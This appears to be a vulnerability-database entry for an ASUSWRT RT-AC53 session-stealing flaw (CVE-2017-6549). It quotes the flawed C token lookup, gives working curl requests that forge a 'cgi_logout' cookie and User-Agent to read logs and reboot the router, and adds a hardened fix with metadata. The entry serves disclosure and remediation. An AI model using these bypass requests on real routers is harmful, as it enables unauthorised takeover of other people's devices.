ID
VAR-E-201703-0072
CVE
cve_id: | CVE-2017-6549 | Trust: 1.8 |
cve_id: | CVE-2017-6547 | Trust: 0.8 |
cve_id: | CVE-2017-6548 | Trust: 0.3 |
EDB ID
41572
TITLE
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing. CVE-2017-6549. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | asuswrt | model: | rt-ac53 | scope: | eq | version: | (3.0.0.4.380.6038) | Trust: 1.6 |
vendor: | asus | model: | wrt cross site scripting nmap nse script | scope: | - | version: | - | Trust: 0.5 |
vendor: | asus | model: | wrt session hijacking nmap nse script | scope: | - | version: | - | Trust: 0.5 |
vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 3.0.0.4.380.6038 | Trust: 0.3 |
vendor: | asus | model: | asuswrt rt-ac53 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
Session Stealing
Component: httpd
CVE: CVE-2017-6549
Vulnerability:
httpd uses the function search_token_in_list to validate whether a user is logged into the admin interface by checking the asus_token cookie value. There seems to be a branch which could be a failed attempt to build in a logout functionality.
asus_token_t* search_token_in_list(char* token, asus_token_t **prev)
{
    asus_token_t *ptr = head;
    asus_token_t *tmp = NULL;
    int found = 0;
    char *cp = NULL;
    while(ptr != NULL)
    {
        if(!strncmp(token, ptr->token, 32)) {
            found = 1;
            break;
        }
        else if(strncmp(token, "cgi_logout", 10) == 0) {
            cp = strtok(ptr->useragent, "-");
            if(strcmp(cp, "asusrouter") != 0) {
                found = 1;
                break;
            }
        }
        else {
            tmp = ptr;
            ptr = ptr->next;
        }
    }
    if(found == 1) {
        if(prev)
            *prev = tmp;
        return ptr;
    }
    else {
        return NULL;
    }
}
If an attacker sets his cookie value to cgi_logout and puts asusrouter-Windows-IFTTT-1.0 into his User-Agent header, he will be treated as signed in if any other administrator session is active.
PoC:
# read syslog
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/syslog.txt
# reboot router
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.1.1/apply.cgi1 -d 'action_mode=reboot&action_script=&action_wait=70'
It’s possible to execute arbitrary commands on the router if any admin session is currently active.
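The flaw lives in the lookup's fallback branch, so the fix is to make session resolution depend on nothing but the token itself. Added example, not code from the advisory or from ASUSWRT (the struct layout, TOKEN_LEN and the demo session are assumptions): a condensed copy of the vulnerable lookup beside a hardened one, with logout handled as a separate operation.

```c
#include <string.h>
#define TOKEN_LEN 32
/* Session record with the fields the advisory's function reads (layout is an assumption). */
typedef struct asus_token {
    char token[TOKEN_LEN + 1];
    char useragent[64];
    struct asus_token *next;
} asus_token_t;
static asus_token_t *head = NULL;
/* Constructed sample: one logged-in admin whose browser sent an ordinary User-Agent. */
asus_token_t demo_admin_session = {
    "0123456789abcdef0123456789abcdef", "Mozilla/5.0 (Windows NT 10.0)", NULL };
void seed_demo_session(void) { demo_admin_session.next = NULL; head = &demo_admin_session; }
/* Condensed copy of the vulnerable lookup: "cgi_logout" resolves to any session whose UA does not start with "asusrouter". */
asus_token_t *search_token_in_list_vuln(const char *token)
{
    for (asus_token_t *ptr = head; ptr != NULL; ptr = ptr->next) {
        if (!strncmp(token, ptr->token, TOKEN_LEN))
            return ptr;
        if (strncmp(token, "cgi_logout", 10) == 0) {
            char ua[sizeof ptr->useragent];     /* copy: strtok writes into its argument */
            strcpy(ua, ptr->useragent);
            char *cp = strtok(ua, "-");
            if (cp == NULL || strcmp(cp, "asusrouter") != 0)
                return ptr;                     /* caller is treated as signed in */
        }
    }
    return NULL;
}
/* Hardened lookup: a session is returned only for an exact, full-length token match;
 * no header value and no magic cookie string can stand in for the token. */
asus_token_t *search_token_in_list_fixed(const char *token)
{
    if (token == NULL || strlen(token) != TOKEN_LEN)
        return NULL;                            /* "cgi_logout" (10 chars) ends here */
    for (asus_token_t *ptr = head; ptr != NULL; ptr = ptr->next)
        if (memcmp(token, ptr->token, TOKEN_LEN) == 0)
            return ptr;
    return NULL;
}
/* Logout is its own operation: unlink the caller's session, never grant access. Returns 1 if removed. */
int logout_token(const char *token)
{
    asus_token_t *target = search_token_in_list_fixed(token);
    for (asus_token_t **pp = &head; target != NULL && *pp != NULL; pp = &(*pp)->next)
        if (*pp == target) { *pp = target->next; return 1; }
    return 0;
}
```

With the demo session seeded, the vulnerable lookup resolves the bare "cgi_logout" cookie to the admin session while the hardened one returns NULL, and only the real token can remove that session.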
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Session Stealing
Trust: 1.6
TAGS
tag: | exploit | Trust: 1.0 |
tag: | xss | Trust: 0.5 |
CREDITS
Bruno Bierbaumer
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2017-6549 | Trust: 1.8 |
db: | EXPLOIT-DB | id: | 41572 | Trust: 1.6 |
db: | NVD | id: | CVE-2017-6547 | Trust: 0.8 |
db: | EDBNET | id: | 91799 | Trust: 0.6 |
db: | PACKETSTORM | id: | 142066 | Trust: 0.5 |
db: | PACKETSTORM | id: | 142065 | Trust: 0.5 |
db: | NVD | id: | CVE-2017-6548 | Trust: 0.3 |
db: | BID | id: | 96938 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2017-6549 | Trust: 1.5 |
url: | https://bierbaumer.net/security/asuswrt/ | Trust: 1.3 |
url: | https://www.exploit-db.com/exploits/41572/ | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2017-6547 | Trust: 0.5 |
url: | https://www.asus.com/asuswrt/ | Trust: 0.3 |
SOURCES
db: | BID | id: | 96938 |
db: | PACKETSTORM | id: | 142066 |
db: | PACKETSTORM | id: | 142065 |
db: | EXPLOIT-DB | id: | 41572 |
db: | EDBNET | id: | 91799 |
LAST UPDATE DATE
2022-07-27T09:11:32.560000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 96938 | date: | 2017-03-23T00:01:00 |
SOURCES RELEASE DATE
db: | BID | id: | 96938 | date: | 2017-03-09T00:00:00 |
db: | PACKETSTORM | id: | 142066 | date: | 2017-04-07T17:32:22 |
db: | PACKETSTORM | id: | 142065 | date: | 2017-04-07T13:33:33 |
db: | EXPLOIT-DB | id: | 41572 | date: | 2017-03-08T00:00:00 |
db: | EDBNET | id: | 91799 | date: | 2017-03-10T00:00:00 |